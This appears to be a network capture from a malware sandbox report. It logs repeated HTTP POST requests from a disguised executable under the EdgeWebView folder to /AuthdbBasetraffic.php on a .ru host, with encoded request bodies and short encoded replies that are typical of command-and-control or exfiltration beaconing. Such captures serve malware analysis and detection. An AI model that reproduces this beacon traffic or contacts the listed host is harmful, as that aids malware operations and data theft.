                                                                                                                          Dec 26, 2024 22:32:45.045382023 CET305OUTPOST /AuthdbBasetraffic.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                                                                                          Host: 321723cm.renyash.ru
                                                                                                                          Content-Length: 1924
                                                                                                                          Expect: 100-continue
                                                                                                                          Dec 26, 2024 22:32:45.470881939 CET25INHTTP/1.1 100 Continue
                                                                                                                          Dec 26, 2024 22:32:46.200611115 CET308INHTTP/1.1 200 OK
                                                                                                                          Server: nginx
                                                                                                                          Date: Thu, 26 Dec 2024 21:32:43 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Content-Length: 152
                                                                                                                          Connection: keep-alive
                                                                                                                          Data Raw: 01 1c 27 58 26 03 3c 10 34 02 20 5e 3c 39 2e 19 23 3f 07 1d 27 17 23 5e 2b 2f 36 59 3c 0a 3e 1c 33 39 3d 43 21 11 02 1c 3c 1f 37 13 2a 0c 2b 59 01 1d 23 5c 24 3b 2b 02 27 04 2d 10 2d 59 3c 1b 29 08 3e 5a 29 3a 34 0e 3f 2b 00 05 34 57 35 08 2b 39 32 10 2e 5a 22 45 2b 1e 08 08 27 17 2c 51 02 11 38 51 21 31 22 09 35 01 23 0b 3d 33 27 5a 21 39 3c 14 26 03 0f 1f 30 3c 3e 17 30 11 39 05 30 34 28 51 33 05 3a 44 32 31 23 0d 26 05 20 5e 22 0e 2b 54 0d 3e 5c 52
                                                                                                                          Data Ascii: 'X&<4 ^<9.#?'#^+/6Y<>39=C!<7*+Y#\$;+'--Y<)>Z):4?+4W5+92.Z"E+',Q8Q!1"5#=3'Z!9<&0<>0904(Q3:D21#& ^"+T>\R


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          13192.168.2.44975437.44.238.250802188C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Dec 26, 2024 22:32:42.512830019 CET329OUTPOST /AuthdbBasetraffic.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                                                                                          Host: 321723cm.renyash.ru
                                                                                                                          Content-Length: 2596
                                                                                                                          Expect: 100-continue
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Dec 26, 2024 22:32:42.867686033 CET2596OUTData Raw: 57 57 58 58 5e 5f 56 50 5d 58 52 5a 56 54 54 55 5f 5c 58 48 59 5e 51 5c 50 59 5c 5d 56 52 54 5d 59 5b 52 45 5f 5e 52 5f 47 54 51 5c 57 51 51 5f 52 55 5c 5c 5a 5a 5a 5d 59 5b 52 5d 50 5e 5c 45 51 53 58 5e 54 58 50 51 46 5e 5b 58 5e 50 59 52 53 5c
                                                                                                                          Data Ascii: WWXX^_VP]XRZVTTU_\XHY^Q\PY\]VRT]Y[RE_^R_GTQ\WQQ_RU\\ZZZ]Y[R]P^\EQSX^TXPQF^[X^PYRS\P_VY]GVVWUZZV_TZBWZT[R\[BQTQA]Z_ZWX[ZUZ_XX__YYYVV]ZZXDXQ_PX]_]]TRU]R_]Y^XZ_XRS^^\ZX[VQ_AQ_XUVQ^AU^[YXZ /=8=-)<5Y4 1>=)*% 3/)+2]< ].#[(
                                                                                                                          Dec 26, 2024 22:32:44.188940048 CET25INHTTP/1.1 100 Continue
                                                                                                                          Dec 26, 2024 22:32:44.188961983 CET158INHTTP/1.1 200 OK
                                                                                                                          Server: nginx
                                                                                                                          Date: Thu, 26 Dec 2024 21:32:41 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Content-Length: 4
                                                                                                                          Connection: keep-alive
                                                                                                                          Data Raw: 33 54 5e 50
                                                                                                                          Data Ascii: 3T^P


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          14192.168.2.44975537.44.238.250802188C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Dec 26, 2024 22:32:44.443595886 CET305OUTPOST /AuthdbBasetraffic.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                                                                                          Host: 321723cm.renyash.ru
                                                                                                                          Content-Length: 2596
                                                                                                                          Expect: 100-continue
                                                                                                                          Dec 26, 2024 22:32:44.789520979 CET2596OUTData Raw: 57 5c 58 5f 5b 51 56 5b 5d 58 52 5a 56 59 54 52 5f 5b 58 48 59 5b 51 5a 50 59 5c 5d 56 52 54 5d 59 5b 52 45 5f 5e 52 5f 47 54 51 5c 57 51 51 5f 52 55 5c 5c 5a 5a 5a 5d 59 5b 52 5d 50 5e 5c 45 51 53 58 5e 54 58 50 51 46 5e 5b 58 5e 50 59 52 53 5c
                                                                                                                          Data Ascii: W\X_[QV[]XRZVYTR_[XHY[QZPY\]VRT]Y[RE_^R_GTQ\WQQ_RU\\ZZZ]Y[R]P^\EQSX^TXPQF^[X^PYRS\P_VY]GVVWUZZV_TZBWZT[R\[BQTQA]Z_ZWX[ZUZ_XX__YYYVV]ZZXDXQ_PX]_]]TRU]R_]Y^XZ_XRS^^\ZX[VQ_AQ_XUVQ^AU^[YXZ#/>\),>9<,%#%[>[**9X2#&0?1<2]+ ].#[(2
                                                                                                                          Dec 26, 2024 22:32:45.807883024 CET25INHTTP/1.1 100 Continue
                                                                                                                          Dec 26, 2024 22:32:46.059945107 CET158INHTTP/1.1 200 OK
                                                                                                                          Server: nginx
                                                                                                                          Date: Thu, 26 Dec 2024 21:32:43 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Content-Length: 4
                                                                                                                          Connection: keep-alive
                                                                                                                          Data Raw: 33 54 5e 50
                                                                                                                          Data Ascii: 3T^P


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          15192.168.2.44975637.44.238.250802188C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Dec 26, 2024 22:32:46.463331938 CET329OUTPOST /AuthdbBasetraffic.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                                                                                          Host: 321723cm.renyash.ru
                                                                                                                          Content-Length: 2596
                                                                                                                          Expect: 100-continue
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Dec 26, 2024 22:32:46.820910931 CET2596OUTData Raw: 52 50 5d 5e 5b 5b 53 5e 5d 58 52 5a 56 54 54 50 5f 5d 58 46 59 58 51 5f 50 59 5c 5d 56 52 54 5d 59 5b 52 45 5f 5e 52 5f 47 54 51 5c 57 51 51 5f 52 55 5c 5c 5a 5a 5a 5d 59 5b 52 5d 50 5e 5c 45 51 53 58 5e 54 58 50 51 46 5e 5b 58 5e 50 59 52 53 5c
                                                                                                                          Data Ascii: RP]^[[S^]XRZVTTP_]XFYXQ_PY\]VRT]Y[RE_^R_GTQ\WQQ_RU\\ZZZ]Y[R]P^\EQSX^TXPQF^[X^PYRS\P_VY]GVVWUZZV_TZBWZT[R\[BQTQA]Z_ZWX[ZUZ_XX__YYYVV]ZZXDXQ_PX]_]]TRU]R_]Y^XZ_XRS^^\ZX[VQ_AQ_XUVQ^AU^[YXZ ,Y&?<?>&%)<[#/<2*%X2 !Z'%+4!( ].#[(
                                                                                                                          Dec 26, 2024 22:32:47.824851990 CET25INHTTP/1.1 100 Continue
                                                                                                                          Dec 26, 2024 22:32:48.185623884 CET158INHTTP/1.1 200 OK
                                                                                                                          Server: nginx
                                                                                                                          Date: Thu, 26 Dec 2024 21:32:45 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Content-Length: 4
                                                                                                                          Connection: keep-alive
                                                                                                                          Data Raw: 33 54 5e 50
                                                                                                                          Data Ascii: 3T^P


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          16192.168.2.44975737.44.238.250802188C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Dec 26, 2024 22:32:48.423146009 CET305OUTPOST /AuthdbBasetraffic.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                                                                                          Host: 321723cm.renyash.ru
                                                                                                                          Content-Length: 2596
                                                                                                                          Expect: 100-continue
                                                                                                                          Dec 26, 2024 22:32:48.774255991 CET2596OUTData Raw: 57 5d 58 59 5b 5b 53 5e 5d 58 52 5a 56 58 54 56 5f 58 58 40 59 5a 51 52 50 59 5c 5d 56 52 54 5d 59 5b 52 45 5f 5e 52 5f 47 54 51 5c 57 51 51 5f 52 55 5c 5c 5a 5a 5a 5d 59 5b 52 5d 50 5e 5c 45 51 53 58 5e 54 58 50 51 46 5e 5b 58 5e 50 59 52 53 5c
                                                                                                                          Data Ascii: W]XY[[S^]XRZVXTV_XX@YZQRPY\]VRT]Y[RE_^R_GTQ\WQQ_RU\\ZZZ]Y[R]P^\EQSX^TXPQF^[X^PYRS\P_VY]GVVWUZZV_TZBWZT[R\[BQTQA]Z_ZWX[ZUZ_XX__YYYVV]ZZXDXQ_PX]_]]TRU]R_]Y^XZ_XRS^^\ZX[VQ_AQ_XUVQ^AU^[YXZ#/<:)?(>S9Z?)Y Z42.:\)=2%Z$,"<-( ].#[(6
                                                                                                                          Dec 26, 2024 22:32:49.786189079 CET25INHTTP/1.1 100 Continue
                                                                                                                          Dec 26, 2024 22:32:50.040679932 CET158INHTTP/1.1 200 OK
                                                                                                                          Server: nginx
                                                                                                                          Date: Thu, 26 Dec 2024 21:32:47 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Content-Length: 4
                                                                                                                          Connection: keep-alive
                                                                                                                          Data Raw: 33 54 5e 50
                                                                                                                          Data Ascii: 3T^P


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          17192.168.2.44975837.44.238.250802188C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Dec 26, 2024 22:32:50.286061049 CET329OUTPOST /AuthdbBasetraffic.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                                                                                          Host: 321723cm.renyash.ru
                                                                                                                          Content-Length: 2592
                                                                                                                          Expect: 100-continue
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Dec 26, 2024 22:32:50.633666039 CET2592OUTData Raw: 57 5d 5d 55 5e 5d 56 5a 5d 58 52 5a 56 5d 54 50 5f 53 58 46 59 5d 51 5b 50 59 5c 5d 56 52 54 5d 59 5b 52 45 5f 5e 52 5f 47 54 51 5c 57 51 51 5f 52 55 5c 5c 5a 5a 5a 5d 59 5b 52 5d 50 5e 5c 45 51 53 58 5e 54 58 50 51 46 5e 5b 58 5e 50 59 52 53 5c
                                                                                                                          Data Ascii: W]]U^]VZ]XRZV]TP_SXFY]Q[PY\]VRT]Y[RE_^R_GTQ\WQQ_RU\\ZZZ]Y[R]P^\EQSX^TXPQF^[X^PYRS\P_VY]GVVWUZZV_TZBWZT[R\[BQTQA]Z_ZWX[ZUZ_XX__YYYVV]ZZXDXQ_PX]_]]TRU]R_]Y^XZ_XRS^^\ZX[VQ_AQ_XUVQ^AU^[YXZ 8?1>,/>5"+,%Z4Z8%.&X=9=% 9'^+< ].#[(.


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          18192.168.2.44975937.44.238.250802188C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Dec 26, 2024 22:32:51.334424019 CET329OUTPOST /AuthdbBasetraffic.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                                                                                          Host: 321723cm.renyash.ru
                                                                                                                          Content-Length: 1924
                                                                                                                          Expect: 100-continue
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Dec 26, 2024 22:32:51.685851097 CET1924OUTData Raw: 52 54 5d 55 5e 5f 53 5a 5d 58 52 5a 56 5b 54 52 5f 5e 58 46 59 5f 51 52 50 59 5c 5d 56 52 54 5d 59 5b 52 45 5f 5e 52 5f 47 54 51 5c 57 51 51 5f 52 55 5c 5c 5a 5a 5a 5d 59 5b 52 5d 50 5e 5c 45 51 53 58 5e 54 58 50 51 46 5e 5b 58 5e 50 59 52 53 5c
                                                                                                                          Data Ascii: RT]U^_SZ]XRZV[TR_^XFY_QRPY\]VRT]Y[RE_^R_GTQ\WQQ_RU\\ZZZ]Y[R]P^\EQSX^TXPQF^[X^PYRS\P_VY]GVVWUZZV_TZBWZT[R\[BQTQA]Z_ZWX[ZUZ_XX__YYYVV]ZZXDXQ_PX]_]]TRU]R_]Y^XZ_XRS^^\ZX[VQ_AQ_XUVQ^AU^[YXZ ;?=*?'Y>&( 82=Z=*-Z1!Y0Y.Y=7>](/ ].#[(:
                                                                                                                          Dec 26, 2024 22:32:52.705739021 CET25INHTTP/1.1 100 Continue
                                                                                                                          Dec 26, 2024 22:32:52.957115889 CET308INHTTP/1.1 200 OK
                                                                                                                          Server: nginx
                                                                                                                          Date: Thu, 26 Dec 2024 21:32:50 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Content-Length: 152
                                                                                                                          Connection: keep-alive
                                                                                                                          Data Raw: 01 1c 27 58 31 3d 02 58 37 05 2f 06 3f 29 2e 51 21 3f 39 1a 24 29 30 01 3c 02 26 1d 28 55 36 1d 24 04 32 1a 23 3f 06 57 3c 57 38 00 29 0c 2b 59 01 1d 23 5f 24 3b 05 04 30 04 00 00 2d 01 20 1b 2a 36 3a 5c 3e 39 2f 52 29 02 3a 03 34 1f 26 1a 3f 29 00 59 2e 3f 3d 1b 3f 30 08 0a 33 3d 2c 51 02 11 38 56 36 0c 2e 08 20 3f 3f 0d 2a 0d 2b 5a 35 03 3f 0f 32 04 25 1c 26 3c 2a 5e 30 3c 3a 5d 24 19 30 56 27 2b 03 19 32 1c 30 54 32 15 20 5e 22 0e 2b 54 0d 3e 5c 52
                                                                                                                          Data Ascii: 'X1=X7/?).Q!?9$)0<&(U6$2#?W<W8)+Y#_$;0- *6:\>9/R):4&?)Y.?=?03=,Q8V6. ??*+Z5?2%&<*^0<:]$0V'+20T2 ^"+T>\R


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          19192.168.2.44976037.44.238.250802188C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Dec 26, 2024 22:32:51.456897974 CET329OUTPOST /AuthdbBasetraffic.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                                                                                          Host: 321723cm.renyash.ru
                                                                                                                          Content-Length: 2596
                                                                                                                          Expect: 100-continue
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Dec 26, 2024 22:32:51.810715914 CET2596OUTData Raw: 57 54 5d 5a 5b 51 56 5c 5d 58 52 5a 56 5f 54 54 5f 59 58 43 59 5e 51 58 50 59 5c 5d 56 52 54 5d 59 5b 52 45 5f 5e 52 5f 47 54 51 5c 57 51 51 5f 52 55 5c 5c 5a 5a 5a 5d 59 5b 52 5d 50 5e 5c 45 51 53 58 5e 54 58 50 51 46 5e 5b 58 5e 50 59 52 53 5c
                                                                                                                          Data Ascii: WT]Z[QV\]XRZV_TT_YXCY^QXPY\]VRT]Y[RE_^R_GTQ\WQQ_RU\\ZZZ]Y[R]P^\EQSX^TXPQF^[X^PYRS\P_VY]GVVWUZZV_TZBWZT[R\[BQTQA]Z_ZWX[ZUZ_XX__YYYVV]ZZXDXQ_PX]_]]TRU]R_]Y^XZ_XRS^^\ZX[VQ_AQ_XUVQ^AU^[YXZ#^;/>/$>%![),%#(&>2\()"&5'Y=(7>[+? ].#[(*
                                                                                                                          Dec 26, 2024 22:32:52.819610119 CET25INHTTP/1.1 100 Continue
                                                                                                                          Dec 26, 2024 22:32:53.072316885 CET158INHTTP/1.1 200 OK
                                                                                                                          Server: nginx
                                                                                                                          Date: Thu, 26 Dec 2024 21:32:50 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Content-Length: 4
                                                                                                                          Connection: keep-alive
                                                                                                                          Data Raw: 33 54 5e 50
                                                                                                                          Data Ascii: 3T^P


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          20192.168.2.44976137.44.238.250802188C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Dec 26, 2024 22:32:53.317014933 CET305OUTPOST /AuthdbBasetraffic.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                                                                                          Host: 321723cm.renyash.ru
                                                                                                                          Content-Length: 2596
                                                                                                                          Expect: 100-continue
                                                                                                                          Dec 26, 2024 22:32:53.664505959 CET2596OUTData Raw: 57 57 5d 5f 5b 5d 53 5a 5d 58 52 5a 56 54 54 5b 5f 53 58 41 59 58 51 52 50 59 5c 5d 56 52 54 5d 59 5b 52 45 5f 5e 52 5f 47 54 51 5c 57 51 51 5f 52 55 5c 5c 5a 5a 5a 5d 59 5b 52 5d 50 5e 5c 45 51 53 58 5e 54 58 50 51 46 5e 5b 58 5e 50 59 52 53 5c
                                                                                                                          Data Ascii: WW]_[]SZ]XRZVTT[_SXAYXQRPY\]VRT]Y[RE_^R_GTQ\WQQ_RU\\ZZZ]Y[R]P^\EQSX^TXPQF^[X^PYRS\P_VY]GVVWUZZV_TZBWZT[R\[BQTQA]Z_ZWX[ZUZ_XX__YYYVV]ZZXDXQ_PX]_]]TRU]R_]Y^XZ_XRS^^\ZX[VQ_AQ_XUVQ^AU^[YXZ#X./)?/;*%"?- Z'^1-(9!\' !3?*[+Q2</ ].#[(
                                                                                                                          Dec 26, 2024 22:32:54.710634947 CET25INHTTP/1.1 100 Continue
                                                                                                                          Dec 26, 2024 22:32:54.964148998 CET158INHTTP/1.1 200 OK
                                                                                                                          Server: nginx
                                                                                                                          Date: Thu, 26 Dec 2024 21:32:52 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Content-Length: 4
                                                                                                                          Connection: keep-alive
                                                                                                                          Data Raw: 33 54 5e 50
                                                                                                                          Data Ascii: 3T^P


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          21192.168.2.44976237.44.238.250802188C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Dec 26, 2024 22:32:55.206276894 CET329OUTPOST /AuthdbBasetraffic.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                                                                                          Host: 321723cm.renyash.ru
                                                                                                                          Content-Length: 2596
                                                                                                                          Expect: 100-continue
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Dec 26, 2024 22:32:55.555139065 CET2596OUTData Raw: 57 51 5d 5a 5e 5c 56 59 5d 58 52 5a 56 58 54 55 5f 5c 58 46 59 55 51 5f 50 59 5c 5d 56 52 54 5d 59 5b 52 45 5f 5e 52 5f 47 54 51 5c 57 51 51 5f 52 55 5c 5c 5a 5a 5a 5d 59 5b 52 5d 50 5e 5c 45 51 53 58 5e 54 58 50 51 46 5e 5b 58 5e 50 59 52 53 5c
                                                                                                                          Data Ascii: WQ]Z^\VY]XRZVXTU_\XFYUQ_PY\]VRT]Y[RE_^R_GTQ\WQQ_RU\\ZZZ]Y[R]P^\EQSX^TXPQF^[X^PYRS\P_VY]GVVWUZZV_TZBWZT[R\[BQTQA]Z_ZWX[ZUZ_XX__YYYVV]ZZXDXQ_PX]_]]TRU]R_]Y^XZ_XRS^^\ZX[VQ_AQ_XUVQ^AU^[YXZ#]./*<+^>5\?2#('>-=*]2&,2X=7+ ].#[(6
                                                                                                                          Dec 26, 2024 22:32:56.576045990 CET25INHTTP/1.1 100 Continue
                                                                                                                          Dec 26, 2024 22:32:56.824353933 CET158INHTTP/1.1 200 OK
                                                                                                                          Server: nginx
                                                                                                                          Date: Thu, 26 Dec 2024 21:32:54 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Content-Length: 4
                                                                                                                          Connection: keep-alive
                                                                                                                          Data Raw: 33 54 5e 50
                                                                                                                          Data Ascii: 3T^P


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          22192.168.2.44976437.44.238.250802188C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Dec 26, 2024 22:32:57.070867062 CET329OUTPOST /AuthdbBasetraffic.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                                                                                          Host: 321723cm.renyash.ru
                                                                                                                          Content-Length: 2596
                                                                                                                          Expect: 100-continue
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Dec 26, 2024 22:32:57.430465937 CET2596OUTData Raw: 57 5d 58 58 5b 5c 53 5b 5d 58 52 5a 56 5e 54 54 5f 5e 58 41 59 5c 51 58 50 59 5c 5d 56 52 54 5d 59 5b 52 45 5f 5e 52 5f 47 54 51 5c 57 51 51 5f 52 55 5c 5c 5a 5a 5a 5d 59 5b 52 5d 50 5e 5c 45 51 53 58 5e 54 58 50 51 46 5e 5b 58 5e 50 59 52 53 5c
                                                                                                                          Data Ascii: W]XX[\S[]XRZV^TT_^XAY\QXPY\]VRT]Y[RE_^R_GTQ\WQQ_RU\\ZZZ]Y[R]P^\EQSX^TXPQF^[X^PYRS\P_VY]GVVWUZZV_TZBWZT[R\[BQTQA]Z_ZWX[ZUZ_XX__YYYVV]ZZXDXQ_PX]_]]TRU]R_]Y^XZ_XRS^^\ZX[VQ_AQ_XUVQ^AU^[YXZ#./:[>;?5=_)?"7<3\%[>Z*=&90*_?$"+ ].#[(.


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          23192.168.2.44976537.44.238.250802188C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Dec 26, 2024 22:32:58.086158991 CET329OUTPOST /AuthdbBasetraffic.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                                                                                          Host: 321723cm.renyash.ru
                                                                                                                          Content-Length: 1924
                                                                                                                          Expect: 100-continue
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Dec 26, 2024 22:32:58.430187941 CET1924OUTData Raw: 52 53 5d 5b 5b 5a 53 5b 5d 58 52 5a 56 58 54 5b 5f 58 58 49 59 5e 51 5f 50 59 5c 5d 56 52 54 5d 59 5b 52 45 5f 5e 52 5f 47 54 51 5c 57 51 51 5f 52 55 5c 5c 5a 5a 5a 5d 59 5b 52 5d 50 5e 5c 45 51 53 58 5e 54 58 50 51 46 5e 5b 58 5e 50 59 52 53 5c
                                                                                                                          Data Ascii: RS][[ZS[]XRZVXT[_XXIY^Q_PY\]VRT]Y[RE_^R_GTQ\WQQ_RU\\ZZZ]Y[R]P^\EQSX^TXPQF^[X^PYRS\P_VY]GVVWUZZV_TZBWZT[R\[BQTQA]Z_ZWX[ZUZ_XX__YYYVV]ZZXDXQ_PX]_]]TRU]R_]Y^XZ_XRS^^\ZX[VQ_AQ_XUVQ^AU^[YXZ /,->/ >S6),!#;&-2=*Y'#=$"[<7%<? ].#[(6
                                                                                                                          Dec 26, 2024 22:32:59.537650108 CET25INHTTP/1.1 100 Continue
                                                                                                                          Dec 26, 2024 22:32:59.788000107 CET308INHTTP/1.1 200 OK
                                                                                                                          Server: nginx
                                                                                                                          Date: Thu, 26 Dec 2024 21:32:57 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Content-Length: 152
                                                                                                                          Connection: keep-alive
                                                                                                                          Data Raw: 01 1c 24 01 31 3d 3f 01 20 5a 2f 06 2a 2a 21 0e 22 11 31 1a 24 5f 24 01 3f 02 3d 06 28 20 31 0d 24 04 21 08 35 3f 20 55 3f 31 01 13 29 1c 2b 59 01 1d 23 16 27 15 0e 11 27 39 2e 01 2e 11 3b 43 3d 25 31 02 2a 5f 23 1b 29 38 2d 5d 34 1f 0b 08 3f 29 08 5d 2e 2c 00 06 2b 20 2a 08 30 3d 2c 51 02 11 38 1f 21 21 31 1f 36 01 12 57 29 0d 19 12 36 2a 24 56 25 13 25 1c 27 05 3e 58 27 3f 2a 12 27 51 33 09 33 3b 2d 18 26 32 3c 55 26 3f 20 5e 22 0e 2b 54 0d 3e 5c 52
                                                                                                                          Data Ascii: $1=? Z/**!"1$_$?=( 1$!5? U?1)+Y#''9..;C=%1*_#)8-]4?)].,+ *0=,Q8!!16W)6*$V%%'>X'?*'Q33;-&2<U&? ^"+T>\R


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          24192.168.2.44976637.44.238.250802188C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Dec 26, 2024 22:32:58.213553905 CET329OUTPOST /AuthdbBasetraffic.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                                                                                          Host: 321723cm.renyash.ru
                                                                                                                          Content-Length: 2596
                                                                                                                          Expect: 100-continue
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Dec 26, 2024 22:32:58.573369980 CET2596OUTData Raw: 57 5c 5d 5e 5b 5a 53 5b 5d 58 52 5a 56 5c 54 51 5f 5f 58 47 59 59 51 5c 50 59 5c 5d 56 52 54 5d 59 5b 52 45 5f 5e 52 5f 47 54 51 5c 57 51 51 5f 52 55 5c 5c 5a 5a 5a 5d 59 5b 52 5d 50 5e 5c 45 51 53 58 5e 54 58 50 51 46 5e 5b 58 5e 50 59 52 53 5c
                                                                                                                          Data Ascii: W\]^[ZS[]XRZV\TQ__XGYYQ\PY\]VRT]Y[RE_^R_GTQ\WQQ_RU\\ZZZ]Y[R]P^\EQSX^TXPQF^[X^PYRS\P_VY]GVVWUZZV_TZBWZT[R\[BQTQA]Z_ZWX[ZUZ_XX__YYYVV]ZZXDXQ_PX]_]]TRU]R_]Y^XZ_XRS^^\ZX[VQ_AQ_XUVQ^AU^[YXZ ,*+^)5+#,^1["[>%Y%093?"[?&)? ].#[(&
                                                                                                                          Dec 26, 2024 22:32:59.734857082 CET25INHTTP/1.1 100 Continue
